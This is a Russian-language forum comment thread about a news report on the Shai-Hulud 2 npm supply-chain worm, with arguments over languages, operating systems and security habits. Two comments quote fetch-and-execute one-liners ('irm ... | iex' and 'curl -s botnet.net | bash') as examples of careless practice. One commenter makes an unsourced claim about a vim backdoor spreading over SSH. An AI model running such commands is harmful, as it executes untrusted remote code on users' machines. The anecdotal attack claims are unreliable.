Компания Wiz опубликовала результаты анализа следов деятельности червя Shai-Hulud 2, в ходе активности которого в репозитории NPM были опубликованы вредоносные выпуски более 800 пакетов, насчитывающих в сумме более 100 млн загрузок. После установки поражённого пакета, активизировавшийся червь выполняет поиск конфиденциальных данных, публикует новые вредоносные релизы (при обнаружении токена подключения к каталогу NPM) и размещает в открытом доступе найденные в системе конфиденциальные данные через создание новых репозиториев в GitHub...Подробнее: https://www.opennet.dev/opennews/art.shtml?num=64377
А можно вкратце, обычному юзеру надо что-то делать?
не использовать javascript, typescript и все прочие недоделки около них
Я недавно был свидетелем атаки через vim. Причем я так понял, девелоперские машины с помощью дыр в нем, давно уже успешно ломают.
К моему разочарованию, у vim даже не проводилось какого-либо серьезного аудита безопасности. При этом его обычно запускают в девелоперской системе с полным доступом и контролем кода. Имея возможность через бэкдор запускать вредоносный сценарий, код помимо прочего читает файл known_hosts и пытается соединиться с серверами по SSH, в надежде на отсутствие passphrase. А у большинства разработчиков на деле, редко в дополнение к ключам используется пароль.Так что любой рабочий код и даже среда разработки, могут иметь вредоносный код.
Ссылку, пж.
Пока нет ссылки - антикриза от джеэсера-нодовика
Каким образом? Просто прочитав специально сконструированный .txt? Можно подробностей?
Вероятно, вредоносный плагин. Или средства удаленной разработки. Или средства доставки обновлений, отладочных символов и чего угодно, что может потребоваться обновить плагинам по Сети.
Частично есть такое. У меня бывший коллега как раз сталкивался с такой проблемой, причем она срабатывала при двух условиях: 1) При локали ru_RU 2) В имени пользователя или в hostname были ключевые слова (в том случае название организации вроде бы). Не исключено, что еще были какие-то проверки признаков, а geoip слишком палевно тащить. Такие вещи явно делались из расчета на то девелоперская среда в очевидно будет ограничена в доступах и пр., но вот код дальше куда то пойдет....
Времена сейчас такие... И очень много работы у нормальных безопасников.
Кстати, такая гадость по идее может быть не только в самом vim, но и в его зависимостях сидеть. Причем срабатывать только при определенных условиях.
У многого ПО исходники используемых библиотек годами никто не смотрит.Кстати, вспомнил, как встречал какую-то гадость, которая отслеживала нужные ей процессы и изменения файлов через inotify. После изменения файла, при первом доступе к записи, вносила эксплоит. Причем это было давно, но сделано хитро конечно. Рассчет видимо на невнимательность разработчика, а также на то, что нет промежуточного код-ревью и сборка проекта не производится на сторонней системе.
А уж как подобная гадость может запускаться - это уже дело эксплоитов, для которых современные системы до сих пор поле непаханное.
А вы все можете сказать хоть что-нибудь толковое? Код вима доступен свободно. ну ка покажите где там закладочки-бэкдорчики? А если плагины, то какие плагины установлены? Пока похоже на тупо трёп.
Публичное поле - это лишь вершина айсберга информации об известных уязвимостях в ПО.
И кстати, о встраивании кода слежки продуктами для разработчиков от M$ всем широко известно. Вам это как-то помогло? Вы по-прежнему ими пользуетесь и предоставляете им доступ Сеть со своих корпоративных машин.
>редко в дополнение к ключам используется парольДаже если используется пароль, ключ может быть запомнен в оперативной памяти, и доступ по ssh пойдёт без ввода пароля.
Мне кажется, все-таки из памяти вытащить пароль несколько сложнее, да и палится проактивной защитой. Но при должном старании и умении, впринципе реально.
> из памяти вытащитьА его не надо тащить, всякие полисикиты сами запомнят.
Полагаю, речь не о прямом доступе к памяти, а об SSH-агентах (ssh-add).
Ну учитывая, что местные безопасТные эксперты борются с sudo/sudoedit (там же найдены (и исправлены) узявимости!!1) и vim от рута запускают, доступ по SSH к их репозиториям - это ещё не самое страшное, что можно получить на их машинах.
да не был ты свидетелем атаки через vim, это мошенники тебя развели
Ну по правде говоря все держится на репутации пакета, в go тоже можно подцепить репозиторий для работы с датами, который в назначенное время откроет порт.
Только вот нюанс - в go можно просто работать с time и не тянуть всякую нечисть, в отличие от.
При желании, можно вообще на встроенных батарейках все выстроить за приемлемые затраты (по сравнению с жабой, офк)
Не использовать linux, очевидно же
А что использовать, Гугло?
ты не поверишь, но:
Open PowerShell
Click the Start Menu, type PowerShell, then open it.Copy and paste the code below, then press enter.
For Windows 8, 10, 11: 📌
irm https://get.activated.win | iex- я конечно скопировал с совсем помойки (просто потому что помню адрес), но увы, подобных рецептов - полный интернет.
curl -s botnet.net | bash
> curl -s botnet.net | bashтам топикстартер (не слишком умный) выдал "не использовать линукс" (чтоб такого вот не было). Я ему показал что совершенно аналогичный подход в венде тоже уже стал абсолютно обычным явлением, не то что юзверьки, а и админы локалхостов ни на секунду не задумываются прежде чем такое вот выполнять (и на промпт uac ответят ок неглядя)
Не тянуть в систему всякое УГ на электроне.
> Не тянуть в систему всякое УГ на электроне.На русте не тянуть. Как и на любом ином лефтпад-языке.
> В GitHub выявлено более 30 тысяч репозиториев с сохранёнными червём перехваченными даннымиОбычные люди не используют гитхаб, им делать ничего не надо.
обычные получат этого червя через curl|sudo su - как они привыкли. Делать им, действительно, ничего не надо.
Да они и не хотят.К тому же trufflehog на их системе ничего полезного со своей точки зрения не найдет, заплачет и самоудалится.
> curl|sudo su - как они привыклиЭтих не жалко, они сами выбрали свой путь. Да пребудет с ними раст.
> обычные получат этого червя через curl|sudo suНу или через dnf install
> На 87% систем использовался Linux, 12% - macOS и 1% - Windows.Ну вот, а говорили что виндузятники дypаки.
А оказалось что в дypaках линуксойды.> "node setup_bun.js"
Ага! Вот он и попался!
Не зря их выкупили, они прям все данные хотят соскрапить.
а я говорил, что популяризация линукс - плохая идея
Федорчук ещё на заре века патетически вопрошал: Нужны ли Линуксу пользователи!?
Таки я согласен с тем, что не нужны. Ну вас на. И вы это уже пару с плюсом десятилетий успешно доказываете. Я доволен.
Что то надо нести ? Горит что есть что взять ? Причины тряски ? Диодное 3D? Physics ?
Угу.
Думаю первые звоночки были уже давно, а ситуация с ХЗ библиотекой была уже набатом.
Просто наивные инфантильные аутисты привыкли верить кому попало.
> 100% опрошенных в интернет опросе пользуются интренетомСлишком толсто, попробуй тоньше, что ли?
не, ну чо ты так... может они не все такие. И большинство запускали этот червяк в wsl.
> 77% - в окружениях систем непрерывной интеграции (60% GitHub Actions, 5% - Jenkins, 5% - > GitLab CI, 3% - AWS CodeBuild)неудивительно что
> На 87% систем использовался Linux
далее:
> 12% - macOS и 1% - Windows.
Итого в сухом остатке получается что ломанули непропорционально много маководов (чуть больше половины всех взломаных персональных аккаунтов)
Интересно, сколько среди этих линуксоидов вендузятники с WSL? :)
Всё это сулит "блестящее" будущее публичным репо.
Скорее не самим публичным репам, а процессу их создания и верификации их содержимого.
надо срочно внедрить шестифакторную идентификацию! С отпечатками всех пальцев и сдачей анализа мочи!(так - точно победим!)
Идея идентификации пользователя с получением адреса устройства не так плоха как кажется
> Идея идентификации пользователя с получением адреса устройства не так плоха как кажетсяПлоха. Да и идентификация к этой теме никак не относится.
>> Идея идентификации пользователя с получением адреса устройства не так плоха как кажется
> Плоха. Да и идентификация к этой теме никак не относится.Смотря с какой стороны посмотреть. Для пенетратора написавшего данный вирус конечно плоха. Для пострадавших - была плоха пока не пострадали. Это как с камерами на дорогах - пока не угнали машину - плохо, следят понимаешь ли за нами, а как пострадали - ищите виновного, все же есть для этого. Вот там где камеры стоят - там находят.
Да хоть 100500-факторную. Когда на сервак ставят 9000 ботов (серт, ИИ, бигдата, машынлёрнинг...), они уже без тебя разберутся с твоим (уже нет) кодом.
Да просто чипировать всех, и коммиты заверять через чип.
Гы... А чего ещё можно было ожидать от технологии, где для "посчитать два плюс два" требуется отдельный пакет из публичной помойки?
Это ты про руст? Ожидать особо нечего было, однако большинство ожидало. Рассуждения пост-фактум мало что значат.
> Это ты про руст?И про него тоже. Теперь только так будет.
руст и джава это две стороны одной монеты, один и тот же коекакерский подход, огороженные среды сборки и магазины библиотек. синтаксис, которым невозможно пользоваться, и тормоза
Неверно.Коекакерский подход особых проблем не вносит, а если бы вносил - не существовало бы ни одной скриптухи, коей являются все языки за исключением одного. И даже этот один язык не существовал бы в текущем виде, а был бы на порядки менее коекакерским. То же относится и к остальным вещам - ядро, всякая системная херота, вэбчик, хттп(и в целом текст), маздайка, множество "людей", как например тутошние комментаторы и писатели новостей. Шланг ака "топ компилятор сишки". Коекакерство это то, что позволяет существовать всему этому. Нельзя локально уйти от чего-то, что является свойством глобальным. Разве что в каких-то сильно примитивных случаях можно изолированный загончик создать. Но ценность этого околонулевая.
А вот настоящая проблема раста это продвижение госухой/админ-ресурсом и полная несостоятельность(потому как всё ворованное, даже компилятор и модели памяти/исполнения). Хотя в жаве что-то отдалённо напоминающее также было("убийца сишки", "быстрее сишки"), но там всё было слишком очевидно. Да и вроде не было широкого использования кулл-техник навроде переписывания сишного кода(на самом деле оборачивания и выдачи за переписанное) или отравления кода присранным за пайку лефтпадом(ядро/ведро, хромой, апт).
Ты кстати в этом комментарии играешь на стороне раста, приравнивая что попало. Это хорошо для продвижения параши, ведь если всё параша - ничего не параша. Если всё имеет в своём составе что-либо коекакерское, значит всё коекакерское(то есть ничего не коекакерское).